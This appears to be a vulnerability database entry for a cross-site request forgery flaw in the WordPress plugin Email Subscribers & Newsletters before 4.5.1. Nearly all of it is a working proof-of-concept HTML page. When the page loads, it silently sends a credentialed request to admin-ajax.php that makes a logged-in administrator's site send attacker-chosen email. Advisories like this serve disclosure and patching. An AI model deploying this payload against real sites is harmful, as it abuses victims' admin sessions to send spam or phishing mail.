Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email()

18 Jul 2020 00:00:00 | Reported by: wpvulndb | Type: wpexploit

Code
<!DOCTYPE html>
<html>
<body onload=run()>
<script>
function run() {
  var targetUrl = "http://example.com/webpage";
  var email = "[email protected]";  
  var subject = "PoC"; 
  var content = "add content here";  

  var xhttp = new XMLHttpRequest();  
  var data = "es_test_email=" + email + "&subject=" + subject +"&content=" + content + "&action=es_send_test_email";
  var url = targetUrl + "/wp-admin/admin-ajax.php?";
  var method = "POST";

  xhttp.open(method, url);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhttp.withCredentials = true;
  xhttp.send(data);
}
</script>
</body>
</html>

Vulners AI Score: 0.3 (Low risk)
EPSS: 0.001